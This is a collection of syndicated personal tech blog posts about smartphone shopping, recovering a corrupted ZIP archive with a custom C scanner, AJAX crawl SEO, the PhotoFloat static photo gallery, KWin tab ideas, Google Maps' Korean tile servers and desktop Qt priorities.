    With that said, maybe it’s time for me to find a smartphone. I still use an old Nokia 1100, which doesn’t support much more than calling and SMS. And Snake II. Windows Phone 7 is out. Meego is dead. WebOS is limping. Blackberry has an arcane dev environment. What’s that leave? Junked up Android. As a platform, Android seems to already be experiencing some bloat and disorganization and Java doesn’t seem too hot. But at the very least it runs Qt now.

    The big problem is finding a satisfactory phone. My critera are fairly simple:

  • QWERTY physical keyboard (I actually would prefer T9, but this is now long past :-( ). This is very important. I will not compromise about this.
  • GSM that runs on AT&T’s 3G network, as well as general GSM support for Europe.
  • Rootable and/or rom-unlockable.
  • Sensible update policy / recent operating system.
  • Big pretty screen.
  • Fast processor.
  • Solid construction.
  • The usual assortment of GPS, Bluetooth, etc do-dads.
  • But nothing like this exists. Well, the Xperia Pro looks almost perfect — AT&T 3G (approx), fast processor, pretty screen, great keyboard, etc — except so far it’s only available for pre-order in the UK and it’s looking unlikely it’ll be hitting the US.

    What is out there that meets these criteria? Why has my research turned up dry continually?

    [Sidenote: actually, the perfect phone for me might be the very dated Nokia E52, but I can’t seem to find a north american model anywhere, even on eBay.]

    Nerdling Sapple: Repairing Corrupted ZIP Files by Brute Force Scanning in C

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    My brother is a wonderful photographer, and took 14 gigabytes of photos at my recent graduation from Columbia, some of which I hope to post on PhotoFloat — my web 2.0 photo gallery done right via static JSON & dynamic javascript.

    . He was kind enough to upload a ZIP of the RAW (Canon Raw 2 – CR2) photos to my FTP server overnight from his killer 50mbps pipe. The next day, he left for a long period of traveling.

    I downloaded the ZIP archive, eager to start playing with the photographs and learning about RAW photos and playing with tools like dcraw, lensfun, and ufraw, and also seeing if I could forge Canon’s “Original Decision Data” tags. To my dismay, the ZIP file was corrupted. I couldn’t ask my brother to re-upload it or rsync the changes or anything like that because he was traveling and it was already a great burden for him to upload these in the nick of time. I tried zip -F and zip -FF and even a few Windows shareware tools. Nothing worked. So I decided to write my own tool, using nothing more than the official PKZIP spec and man pages.

    First a bit about how ZIP files are structured — everything here is based on the famous official spec in APPNOTE.TXT. Zip files are structured like this:

        [local file header 1]
        [file data 1]
        [data descriptor 1]
        . 
        .
        .
        [local file header n]
        [file data n]
        [data descriptor n]
        [archive decryption header] 
        [archive extra data record] 
        [central directory]
        [zip64 end of central directory record]
        [zip64 end of central directory locator] 
        [end of central directory record]
    

    Generally unzippers seek to the central directory at the end of the file, which has the locations of all the files in the zip, along with their sizes and names. It reads this in, then seeks back up to the top to read the files off one by one.

    The strange thing about my brother’s broken file was that the beginning files would work and the end files would work, but the middle 11 gigabytes were broken, with Info-ZIP complaining about wrong offsets and lseeks. I figured that some data had been duplicated/reuploaded at random spots in the middle, so the offsets in the zip file’s central directory were broken.

    For each file, however, there is a local file header and an optional data descriptor. Each local file header starts with the same signature (0x04034b50), and contains the file name and the size of the file that comes after the local file header. But sometimes, the size of the file is not known until the file has already been inserted in the zip file, in which case, the local file header reports “0″ for the file size and sets bit 3 in a bit flag. This indicates that after the file, of unknown length, there will be a data descriptor that says the file size. But how do we know where the file ends, if we don’t know the length before hand? Well, usually this data is duplicated in the central directory at the end of the zip file, but I wanted to avoid parsing this all together. Instead, it turns out that, though not in the official spec, APPNOTE.TXT states, “Although not originally assigned a signature, the value 0x08074b50 has commonly been adopted as a signature value for the data descriptor record. Implementers should be aware that ZIP files may be encountered with or without this signature marking data descriptors and should account for either case when reading ZIP files to ensure compatibility. When writing ZIP files, it is recommended to include the signature value marking the data descriptor record.” Bingo.

    So the recovery algorithm works like this:

    • Look for a local file header signature integer, reading 4 bytes, and rewinding 3 each time it fails.
    • Once found, see if the size is there. If the size is in it, read the data to the file path.
    • If the size isn’t there, search for the data descriptor signature, reading 4 bytes, and rewinding 3 each time it fails.
    • When found, rewind to the start of the data segment and read the number of bytes specified in the data descriptor.
    • Rewind to 4 bytes after the local file header signature and repeat process.

    The files may optionally be deflated, so I use zlib inline to inflate, the advantage of which is that this has its own verification built in, so I don’t need to use zip’s crc32 (though I should).

    Along the way there is some additional tricky logic for making sure we’re always searching with maximum breadth.

    The end result of all this was… 100% recovery of the files in the archive, complete with their full file names. Win.

    You can check out the code here. Suggestions are welcome. It’s definitely a quick hack, but it did the job. Took a lot of fiddling with to make it work, especially figuring out __attribute__((packed)) to turn off gcc’s power-of-two padding.

    Nerdling Sapple: Search Engine Optimization with AJAX Apps using the AJAX Crawl Specification

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    Update: Now instead of using HtmlUnit, which proved to be very slow and memory intensive, I’ve written my own ServerExecute app based on WebKit using QtWebKit. Check it out here.

    PhotoFloat follows the design of using a static html page with a static javascript app that creates dynamic layouts from static json files on the server. This means that googlebot has nothing to index, since it doesn’t run javascript. Uh oh!

    But not quite. A comment in my blog post pointed me toward Google’s AJAX Crawl specification, which is incredible. Basically, sites that use URLs like: http://photos.​jasondonenfeld.​com/#!/​columbia_winter_senior​/img_1712.jpg with the #! in there (as Twitter does, for example) get rewritten by googlebot to http://photos.​jasondonenfeld.​com/?_escaped_fragment_=​columbia_winter_senior​/img_1712.jpg. Then, on the server, using a combination of mod_rewrite, a lil php script as a loader, and a tiny Java app I wrote around HtmlUnit (Google says HtmlUnit it’s industry standard), the server sends back static HTML as if a browser had already run all the JavaScript and executed HTML requests.

    Aside from SEO, it means that Facebook’s crawler can get the proper title and the thumbnails:

    The web evidently is moving away from server-generated HTML and onto JavaScript interfaces, and this is a way to keep up SEO.

    Source:

  • Java app
  • PHP loader
  • .htaccess lines:
    RewriteCond %{QUERY_STRING} _escaped_fragment_=
    RewriteRule . staticrender.php [L]
  • Hope this is useful.

    Nerdling Sapple: PhotoFloat — A Web 2.0 Photo Gallery Done Right via Static JSON & Dynamic Javascript

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    UPDATE: Because of the wonderful reception across the internet, I’ve put together an instruction page on how to get this set up on your own server.

    I don’t really like database driven photo management software, and prefer instead to manage my photos in a good old no-nonsense directory structure. For this reason, I was particularly attracted to Zenphoto as a means of getting my photos online, as it works on directory structures. Unfortunately, Zenphoto is horrible; it’s riddled with bugs, inconstant, a cluttered architecture, and most of all, it’s extremely slow. Every time it runs, it re-scans directories and makes a bazillion SQL calls. The viewer interface is also outdated and clunky, having a different html page for each photo. So I went back to the drawing board and considered how to make things better.

    Introducing PhotoFloat. The idea is this — instead of scanning and caching metadata and thumbnails during page load time, everything is to be done prior. It’s a bit of an old school mentality. There is a script that generates static json files of metadata and album structures and static thumbnails of images, so that all the content can be served directly by Apache. Why? Because I only need to generate new thumbnails and data files when I upload new images (or alternatively, on a cron job). So that’s what I did; I wrote a simple python script that walks a directory structure looking for new or changed images and albums. It’s smart too — to be super zippy, it does file modification time comparisons. It also cleans up after itself, deleting stale files.

    So I have all my original images on my webserver, because I have Dreamhost’s unlimited hosting. I also have another directory that I populate with symlinks to the directories I actually want online. Every time there are new images, my python script fires up, and updated json data files and thumbnail files are generated.

    Great, but where does this leave us? What can we do with json files? This is where things become wonderful. Since all the data for the gallery is AJAX fetchable, there is a single html page and a single javascript file that takes care of the whole gallery. That’s right — all of the display of views is done client side, and in one page load.

    To keep track of pages and for swapping around links, each different album and different image has it’s own hash url, like, for example: #!/new_hampshire_in_snow_3.15.11-3.17.11/img_1919.jpg. It’s all lower case with naughty characters stripped out to keep up with the patterns of wordpress and other web apps. These function as permalinks.

    The albums have extensive support for EXIF metadata, which can be loaded by clicking ‘show metadata’, and a transparent box slides up over the photo. There’s also the ability to download the original photos.

    Each album gets a randomized thumbnail which assigns probabilities to each image in the album based on the number of images in each album and the depth of subalbums. The randomization algorithm is all done at client side.

    Images are preloaded. Album data is prefetched. Everything is cached sanely. JSON files are gzipped. There are animations between views and smooth scrolling. The right and left arrow keys work. Clicking on the photo advances it, like on Facebook. Finally, I do include one dynamic script — a simple php script that takes old Zenphoto URLs and translates them into the new ones, so that people with old links can still access the same photos.

    Essentially, there are a lot of little details that had to be done right, and to my knowledge, no web gallery that works on directory structures has done it well, making an ajaxy and speedy gallery. So now you have PhotoFloat. I’ve just finished writing it, and the code is a bit of a mess, but let me know if you have any suggestions or find any bugs.

    You can browse the code in the git repository or try it out live on my photo site. If you make any modifications of my code or use it on your own site, please inform me and send any modifications back to me. Remember to run make on the web directory to minify the css and javascript, and also, be sure to change the google analytics tracking ID in web/js/999-googletracker.js.

    Comments? Suggestions?

    Update 2 for KDEers: It looks like some people from kipi-plugins and kphotoalbum are interested in building integration for this in.

    Update 3: Following a suggestion in the comments below, URLs now use #!, which google translates to a special query string, and I’ve written a serverside component that executes the JavaScript and displays static content for googlebot. This allows the metadata to be crawled.

    Nerdling Sapple: KDE Alive with KWin Menu Excitement

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    Martin’s post set off an eruption of ideas and debates over integrating dbusmenu and kwin and proposals for a new tabbed API. To quote José Pedro‘s comment:

    The most important things I see lacking in Kwin from KDE 4.5 are an API to allow windows to open in a specific existing group (make a new tab in the decoration), and that the windows from a specific group are not grouped in the taskbar. I also think that if these 2 problems are fixed, most apps in KDE could use the decoration tabs instead of relying on the currently used tabs, inside the application itself. The important thing to notice here is the natural mix between the application tabs and the menu button. These complete each other, and all apps in KDE which rely on tabs to show documents would ideally use this system (dolphin, rekonq, kate, kword… just to name a few).

    Here are some screen shots proposed in the comment thread:



    Having an easy API to enable this would be very welcome.
    setMainMenu(menu);
    setWindowTabs(tabWidget);

    Elsewhere in KWin settings:

    [ X ] Place tabs in window border when supported.
    [   ] Place main menu in window border when supported.

    Nerdling Sapple: Strap on your Tin Foil Hats, Kids: Google Maps Uses Different Data for Korean Sea Areas

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    Frittering away time I absent-mindedly loaded up the Google Maps API Javascript File and, hazy-eyed, noticed some references to http://mt0.gmaptiles.co.kr. Co.kr? Korea? Why are there references for a Korean tile server in the global api file?

    So digging deeper, I supposed that those numbers surrounding the urls were coordinates on the globe. A simple sloppy bash one liner later and we have the following:

    $ curl -s http://maps.google.com/maps/api/js?sensor=false|tr ',' '\n'|grep -E '([0-9]+\]+|\[+[0-9]+)'|tr -d ']['|head -n -2|tail -n +2|while read lat; do read long; echo "$(echo "scale=8;$lat / 10000000"|bc),$(echo "scale=8; $long / 10000000"|bc)"; done | sort | uniq

    32.98908400,124.60556000
    33.00000000,124.60500000
    34.46467400,128.49609400
    34.50000000,127.96000000
    34.89000000,128.67000000
    35.02774700,128.84765600
    35.46900000,129.36000000
    36.65000000,129.70000000
    37.02777300,131.05316200
    38.62000000,127.96000000
    38.62000000,128.67000000
    38.62000000,129.36000000
    38.62000000,132.00347900
    38.69301300,128.49609400
    38.69301300,128.84765600
    38.69301300,131.05316200
    38.69301300,132.00347900

    Open these in tabs. We see strange locations in the seas surrounding Korea, including a few locations on land.


    Why?

    Update: Mystery Solved! A commenter writes, “This is due to Korean law prohibiting exporting detailed maps outside of Korea. That’s why Google (and other companies like Yahoo) set up separate server in Korea for detailed Korean map tiles. Areas linked in this post are supposed to be Korean water and land frontiers. This is actually a legacy of cold war era.”

    Nerdling Sapple: Nokia Admits to not Focusing on Desktop Qt

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    In a comment from a Qt Nokia engineer:

    Qt on the desktop is currently not a priority for our R&D team, even though Nokia does use Qt for desktop applications (and not only Qt Creator). That doesn’t mean that nobody is working on it, however we do believe that Qt is a great development tool for desktop applications, even if we just maintain it and keep it working on the desktop platforms. We definitely want to keep it that way, and we continue to improve and modernize Qt on the desktop as well, but I personally don’t really see that there are a lot of new features we could add to make Qt significantly more powerful for desktop development (esp features that are already provided by other libraries – why cannibalize our own community?).

    Perhaps obvious and expected, but are we okay with this admission?